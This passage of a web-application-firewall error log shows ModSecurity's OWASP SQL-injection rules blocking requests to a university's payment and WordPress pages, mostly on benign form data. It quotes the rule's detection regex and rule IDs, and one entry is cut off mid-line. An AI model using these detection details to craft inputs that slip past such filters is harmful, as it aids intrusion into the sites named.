[\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYQAAAAG"]
[Tue Aug 29 09:19:45.463672 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYUAAAAG"]
[Tue Aug 29 09:19:45.824223 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYYAAAAG"]
[Tue Aug 29 09:19:45.983331 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwcCo-f0AAPbOKYcAAAAG"]
[Tue Aug 29 09:19:46.153832 2023] [:error] [pid 63182] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS:fields: [\\x22nopmb\\x22,\\x22nama\\x22,\\x22nmstmskmhs\\x22,\\x22notelp\\x22,\\x22nmsetbiayapmb\\x22,\\x22nominal\\x22,\\x22nmjadwalpmb\\x22,\\x22nokuitansipmb\\x22,\\x22tglkuitansipmb\\x22,\\x22jamkuitansipmb\\x22,\\x22nmcarabyr\\x22,\\x22noref\\x22,\\x22jmlbayar\\x22,\\x22password\\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/pendaftaran/c_penerimaanpembayaran/grid"] [unique_id "ZO1VwsCo-f0AAPbOKYgAAAAG"]
[Tue Aug 29 09:20:21.553083 2023] [:error] [pid 62955] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwCllgCn4UCghwmG4vyeIdN8_gBJekOm1BPhrhz1VsfSS9fhXLN7Wm0Rz5kQc4KNVmLDsBlfTFt1hwtVwi5hH-5kJIl1FyRM9-IRY7Tax9HFqadZWwF0afcmlcovtpuwL2Fd9JpMHZ88n_83KqrmuqnYm7afayqGtjW0AcFACBnWcC6WxLpqhE7NRfng_2Ja-ZcNF5TQku-5kD_bAtDpGEgDEt2rqdeaDGa_zUY1aWBeImf1R-ZsP6LLbmPLyUkyNv_xNy_hJm2bnneYA_NclTKIBh4lNjAUg7j9VcN9q6deXU9ebwMuIc6EXom_vsgrB3lkPIZ0G_mPfyH1sRLXSaDT5DM0ewu5Uj_pyFE_kcnDpcJ62iY0P-zIcQmrwEJyfgO_ekXNM8s_V0ABKzGenEjYAbMHrbtp3cRKniwml7JgcOgJg-x6K_NxCU6Xr02..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1V5cCo-f0AAPXrJYUAAAAK"]
[Tue Aug 29 09:26:38.668604 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c60b85d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1XXsCo-f0AAPgD0bUAAAAO"]
[Tue Aug 29 09:26:39.042566 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO1XX8Co-f0AAPgD0bYAAAAO"]
[Tue Aug 29 09:26:39.202275 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/404"] [unique_id "ZO1XX8Co-f0AAPgD0bcAAAAO"]
[Tue Aug 29 09:26:39.504634 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/css/admin-bar.min.css"] [unique_id "ZO1XX8Co-f0AAPgD0bgAAAAO"]
[Tue Aug 29 09:26:39.507626 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/css/dist/block-library/style.min.css"] [unique_id "ZO1XX8Co-f0AAPgLalQAAAAJ"]
[Tue Aug 29 09:26:39.516430 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/YouTubePopUp.css"] [unique_id "ZO1XX8Co-f0AAPgEgvcAAAAZ"]
[Tue Aug 29 09:26:39.516496 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/YouTubePopUp.css"] [unique_id "ZO1XX8Co-f0AAPgEgvcAAAAZ"]
[Tue Aug 29 09:26:39.518092 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/vp-close-icon/close-button-icon.css"] [unique_id "ZO1XX8Co-f0AAPgK@HcAAAAI"]
[Tue Aug 29 09:26:39.518164 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/css/vp-close-icon/close-button-icon.css"] [unique_id "ZO1XX8Co-f0AAPgK@HcAAAAI"]
[Tue Aug 29 09:26:39.519304 2023] [:error] [pid 63503] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/style.css"] [unique_id "ZO1XX8Co-f0AAPgPY5gAAAAK"]
[Tue Aug 29 09:26:39.525457 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/magnific-popup/magnific-popup.min.css"] [unique_id "ZO1XX8Co-f0AAPgLalUAAAAJ"]
[Tue Aug 29 09:26:39.530112 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/fontawesome/css/font-awesome.min.css"] [unique_id "ZO1XX8Co-f0AAPgD0bkAAAAO"]
[Tue Aug 29 09:26:39.532709 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js"] [unique_id "ZO1XX8Co-f0AAPgEgvgAAAAZ"]
[Tue Aug 29 09:26:39.532767 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js"] [unique_id "ZO1XX8Co-f0AAPgEgvgAAAAZ"]
[Tue Aug 29 09:26:39.533345 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.js"] [unique_id "ZO1XX8Co-f0AAPgK@HgAAAAI"]
[Tue Aug 29 09:26:39.533403 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/js/YouTubePopUp.js"] [unique_id "ZO1XX8Co-f0AAPgK@HgAAAAI"]
[Tue Aug 29 09:26:39.535544 2023] [:error] [pid 63503] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/hoverintent-js.min.js"] [unique_id "ZO1XX8Co-f0AAPgPY5kAAAAK"]
[Tue Aug 29 09:26:39.540183 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/admin-bar.min.js"] [unique_id "ZO1XX8Co-f0AAPgLalYAAAAJ"]
[Tue Aug 29 09:26:39.543177 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/jquery.bxslider.min.js"] [unique_id "ZO1XX8Co-f0AAPgD0boAAAAO"]
[Tue Aug 29 09:26:39.549552 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/sticky/jquery.sticky.min.js"] [unique_id "ZO1XX8Co-f0AAPgEgvkAAAAZ"]
[Tue Aug 29 09:26:39.550845 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/magnific-popup/jquery.magnific-popup.min.js"] [unique_id "ZO1XX8Co-f0AAPgK@HkAAAAI"]
[Tue Aug 29 09:26:39.552180 2023] [:error] [pid 63503] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/navigation.min.js"] [unique_id "ZO1XX8Co-f0AAPgPY5oAAAAK"]
[Tue Aug 29 09:26:39.556465 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/fitvids/jquery.fitvids.min.js"] [unique_id "ZO1XX8Co-f0AAPgD0bsAAAAO"]
[Tue Aug 29 09:26:39.560779 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/skip-link-focus-fix.min.js"] [unique_id "ZO1XX8Co-f0AAPgLalcAAAAJ"]
[Tue Aug 29 09:26:39.568738 2023] [:error] [pid 63492] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/js/colormag-custom.min.js"] [unique_id "ZO1XX8Co-f0AAPgEgvoAAAAZ"]
[Tue Aug 29 09:26:39.569148 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/wp-embed.min.js"] [unique_id "ZO1XX8Co-f0AAPgK@HoAAAAI"]
[Tue Aug 29 09:26:40.056445 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/dark.css"] [unique_id "ZO1XYMCo-f0AAPgQWqkAAAAM"]
[Tue Aug 29 09:26:40.433544 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/colormag/fontawesome/fonts/fontawesome-webfont.woff2"] [unique_id "ZO1XYMCo-f0AAPgQWqoAAAAM"]
[Tue Aug 29 09:26:47.221902 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/profile.php"] [unique_id "ZO1XZ8Co-f0AAPgW9woAAAAU"]
[Tue Aug 29 09:26:47.221990 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/profile.php"] [unique_id "ZO1XZ8Co-f0AAPgW9woAAAAU"]
[Tue Aug 29 09:26:47.783890 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/easy-hide-login/style.css"] [unique_id "ZO1XZ8Co-f0AAPgD0bwAAAAO"]
[Tue Aug 29 09:26:47.783960 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/easy-hide-login/style.css"] [unique_id "ZO1XZ8Co-f0AAPgD0bwAAAAO"]
[Tue Aug 29 09:26:47.784911 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1XZ8Co-f0AAPgW9wsAAAAU"]
[Tue Aug 29 09:26:47.784977 2023] [:error] [pid 63510] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-admin/load-styles.php"] [unique_id "ZO1XZ8Co-f0AAPgW9wsAAAAU"]
[Tue Aug 29 09:26:47.796328 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-comments/assets/css/notice.css"] [unique_id "ZO1XZ8Co-f0AAPgQWqsAAAAM"]
[Tue Aug 29 09:26:47.796392 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/disable-comments/assets/css/notice.css"] [unique_id "ZO1XZ8Co-f0AAPgQWqsAAAAM"]
[Tue Aug 29 09:26:47.796988 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/css/admin_page.css"] [unique_id "ZO1XZ8Co-f0AAPgK@HsAAAAI"]
[Tue Aug 29 09:26:47.797049 2023] [:error] [pid 63498] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/google-captcha/css/admin_page.css"] [unique_id "ZO1XZ8Co-f0AAPgK@HsAAAAI"]
[Tue Aug 29 09:26:47.800323 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1XZ8Co-f0AAPgLalgAAAAJ"]
[Tue Aug 29 09:26:47.800385 2023] [:error] [pid 63499] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/admin/css/meta-row-style.css"] [unique_id "ZO1XZ8Co-f0AAPgLalgAAAAJ"]
[Tue Aug 29 09:26:47.801582 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/limit-login-attempts.css"] [unique_id "ZO1XZ8Co-f0AAPgY6nUAAAAW"]
[Tue Aug 29 09:26:47.801647 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/limit-login-attempts-reloaded/assets/css/limit-login-attempts.css"] [unique_id "ZO1XZ8Co-f0AAPgY6nUAAAAW"]
[Tue Aug 29 09:26:47.815393 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1XZ8Co-f0AAPgD0b0AAAAO"]
[Tue Aug 29 09:26:47.815454 2023] [:error] [pid 63491] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/video-popup/tinymce/css/tinymce.css"] [unique_id "ZO1XZ8Co-f0AAPgD0b0AAAAO"]
[Tue Aug 29 09:26:47.818843 2023] [:error] [pid 63504] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css"] [unique_id "ZO1XZ8Co-f0AAPgQWqwAAAAM"]
[Tue Aug 29 09:26:47.821170 2023] [:error] [pid 63512] [client 203.176.176.235] ModSecurity: Rule 7fe1c572e160 [id "981172"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "157"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wp-includes/js/mediaelement/wp-mediaelement.min.css"] [unique_id "ZO1XZ8Co-f0AAPgY6nYAAAAW"]
